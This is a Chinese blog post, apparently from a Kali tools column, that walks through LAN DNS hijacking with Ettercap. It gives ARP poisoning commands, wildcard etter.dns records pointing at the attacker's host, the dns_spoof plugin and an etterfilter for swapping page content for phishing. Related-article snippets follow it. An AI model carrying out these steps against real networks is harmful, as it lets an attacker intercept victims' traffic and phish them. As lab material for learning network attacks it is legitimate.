DNS劫持案列

最新推荐文章于 2023-10-30 09:48:28 发布
最新推荐文章于 2023-10-30 09:48:28 发布
阅读量407 收藏 1
点赞数
分类专栏: kali工具篇 文章标签: java 前端 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58000413/article/details/126630318
版权

注意:仅用于技术讨论,切勿用于其他用途,一切后果与本人无关!!!

一、ARP协议简介

        ARP即地址解析协议,用于现实从ip地址到MAC地址的映射,即询问目标ip对应的MAC地址

        我们能够通过修改mac地址来达到中间人拦截、局域网流控、流量欺骗等情况。

二、Ettercap简介

三、Ettercap常用指令

        1.用户界面类型

        -T,        -text        使用只显示字符的界面

        -q,        -quiet        安静模式,不显示抓到的数据包内容

        -G,        -gtk        使用GTK+GUI,开启图形化模式

        2.日志选项

        -w,        -write<file>        将嗅探到的数据写入pcap文件<file>

        -L,        -log<logfile>        此处记录所有流量<logfile>

        3.通用选项

        -i,        -iface<face>        使用该网络接口

        -l,        -liface        显示所有的网络接口

        -P,        -plugin<plugin>        开始该插件<plugin>

        -F,        -filter<file>        加载过滤器<file>(内容过滤 器)

        4.嗅探与攻击选项

        -M,        mitm<方法:ARGS>        执行mitm攻击

四、Ettercap案例

        1.开启apache服务

        编辑html文件:leafpad  /var/www/html/

        service  apache2  start

        2.编辑ettercap配置文件

        leafpad  /etc/ettercap/etter.dns

        添加

                *                        A        198.168.199.127        根据本地ip填写

                *                        PTR        192.168.199.127        根据本地ip填写

        3.Ettercap使用图形化

        Ettercap -G

        4.命令行测试

        ettercap  -qT  -i  eth0  -M  arp:remote  - w  1.pcap  /kali地址//靶机主机/

        Ettercap替换网页内容---钓鱼

        1.准备过滤脚本

        官方提示脚本:        cd  /usr/share/ettercap/

        2.编译脚本

        etterfilter  head.filter  -o  head.ef                   //head.filter为脚本名字

        3.导入脚本

         Filters -> Load  a  Filter..        选择 脚本文件

        4.继续添加Plugins中的dns_spoof

         5.最后都要选择ARP  poisoning...开始

不习惯有你
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DNS 攻击例介绍
glb111的博客
04-23 955
近年来,利用 DNS 进行攻击事件不在少数,下面本文将从大量例中选取一些热点事件进行介绍。
聊一聊DNS劫持那些事
阿里云云栖号
10-14 1835
作为《DNS攻击防范科普系列》的最后一篇,今天我们来好好聊聊DNS劫持。先回顾一下DNS劫持的概念?DNS劫持即通过某种技术手段,篡改正确域名和IP地址的映射关系,使得域名映射到了错误的IP地址,因此可以认为DNS劫持是一种DNS重定向攻击。DNS劫持通常可被用作域名欺诈,如在用户访问网页时显示额外的信息来赚取收入等;也可被用作网络钓鱼,如显示用户访问的虚假网站版本并非法窃取用户的个人信息。 那D...
DNS劫持
weixin_34021089的博客
03-15 255
  DNS劫持又称域名劫持,是指在劫持的网络范围内拦截域名解析的请求,分析请求的域名,把审查范围以外的请求放行,否则返回假的IP地址或者什么都不做使请求失去响应,其效果就是对特定的网络不能反应或访问的是假网址。   DNS(域名劫持)是把网络地址(域名,以一个字符串的形式)对应到真实的计算机能够识别的网络地址(IP地址),以便计算机能够进一步通信,传递网址和内容等。由于域名劫持往往只能在特定的被...
针对TP-LINK的CSRF攻击来劫持DNS
weixin_33862041的博客
03-08 235
瞌睡龙 · 2013/10/31 16:240x00 背景路由被CSRF攻击,修改DNS的话题最近一直比较活跃,但是国内貌似没有一个技术文章详细的分析此漏洞,漏洞成因比较简单,本篇来科普一下。本篇讲得是一个利用CVE-2013-2645的漏洞,来修改TP-LINK的DNS例,针对其他路由的攻击大同小异。0x01 EXP分析攻击者会在自己的网站或者已经受他控制的网站上加入一段javascript代...
Windows实验——DNS劫持演练
浅浅的博客
03-08 4130
一、实验环境 钓鱼网站:虚拟机Windows Server 2008的缺省网站 IP:192.168.43.44 攻击者:物理机Win 10 IP:192.168.43.89 被攻击者:物理机Win 7 ...
C++实现DNS劫持
09-08
DNS劫持源代码,用户可以传一个ip当作DNS服务器,被攻击者的dns会自动指向您的欺诈DNS服务器。
android 系统 DNS 劫持软件
10-09
可以用于DNS劫持劫持手机上面的DNS访问,把重定向DNS服务器导入到我们自己的服务器上面,然后,想干嘛干嘛 adb push libs/armeabi-v7a/dnsproxy2 /data/local/tmp adb push res/raw/20dnsproxy2 /data/local/tmp ...
DNS域名劫持服务器
06-07
使用MFC实现的小型DNS服务器,通过修改DNS报文,内部可以实现域名劫持功能
GoogleDNS劫持背后的技术分析
03-04
最近世界真是越来越不太平了,尤其是对于大部分普通人而言。昨天又传来噩耗,根据网络监测公司BGPMon,Google的公开DNS服务器IP8.8.8.8被劫持到了委内瑞拉和巴西超过22分钟。
DNS劫持如何避免和解决?
10-01
虽然我们经常上网,但并不是每个人都对开启一个网页背后的机制了如指掌。网页浏览存在诸多环节,被劫持的机会很多,其中DNS非常容易被做手脚
dns、http劫持
【持续做一件事,必定有所成就!抛弃世俗之浮躁,留我钻研之刻苦!】
08-16 512
http://m635674608.iteye.com/blog/2342832
DNS劫持的原理是什么?看这几种示例图就知道了
a20405010505的博客
09-20 1241
DNS劫持又叫域名劫持,指攻击者利用其他攻击手段(比如劫持了路由器或域名服务器等),篡改了某个域名的解析结果,使得指向该域名的IP变成了另一个IP,导致对相应网址的访问被劫持到另一个不可达的或者假冒的网址,从而实现非法窃取用户信息或者破坏正常网络服务的目的。  IIS7网站监控  测网站打开速度、网站是否被劫持、域名是否被墙等问题。  DNS劫持的几种示意图: ...
初级dns劫持
haha1314的博客
05-13 503
同一网段Dns劫持 环境:windows server 2008 python Scapy sniff抓包 绑定虚拟机网卡 抓DNS的包 接下来造包 Python 实现劫持 代码如下:`` from scapy.all import * #swlan="Realtek 8821CE Wireless LAN 802.11ac PCI-E NIC" xwlan="VM...
JavaScript实现DNS劫持(附完整源码)
希望我的博客,能帮上你解决学习中工作中所遇到的问题
10-30 250
JavaScript实现DNS劫持(附完整源码)
oracle DNS解析_DNS域名劫持DNS域名劫持的6种方式及解决方法详解
weixin_39582724的博客
11-02 262
DNS劫持又称域名劫持,是指在劫持的网络范围内拦截域名解析的请求,分析请求的域名,把审查范围以外的请求放行,否则返回假的IP地址或者什么都不做使请求失去响应,其效果就是对特定的网络不能访问或访问的是假网址。 IIS7站长之家网站监控可以做到:检测网站是否被劫持、域名是否被墙、DNS污染检测、网站打开速度检测、网站是否被黑、被入侵、被改标题、被挂黑链。下载地址:IIS7网站监控...
DNS劫持攻击实验
文武老司机的博客
12-24 2088
DNS劫持攻击: 0x01 攻击目的: ​ 劫持靶机的DNS请求,将靶机所有的http请求流量都引导到攻击机搭建的web服务器(shadow website)供靶机访问。 0x02 环境介绍: ​ 攻击机:Kali linux ​ 靶机:ubuntu 20.04 ​ 存在形式:vmware之虚机 ​ 联网方式:NAT ​ IP地址: ​ Gateway:192.168.8.2/24 ​ Kali linux:192.168.8.128/24 ​
DNS 劫持及解决方之 HTTPDNS
chuanglan的专栏
06-07 8110
1. 为什么会有 DNS DNS 即域名系统(Domain Name Server),其主要用于将域名解析为对应的 IP 地址。 那么为什么会有域名到 IP 地址的解析这一需要呢?就需要从人的角度和计算机的角度去分析了。 人的角度:网络上的主机一般是通过 IP 地址唯一确定,但 IP 不便于人们记忆,如果每个人都需要通过 IP 来访问其他主机,那记忆量太大了,因此才借用域名来间接地标识一台...
DHCPv6-DNS劫持
最新发布
01-13
DHCPv6-DNS劫持是一种网络攻击技术,通过在IPv6 DHCP服务器上设置恶意的DNS服务器地址,将用户的DNS查询重定向到攻击者控制的DNS服务器上。这样攻击者可以篡改DNS响应,将用户的域名解析请求指向恶意的网站或者劫持...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值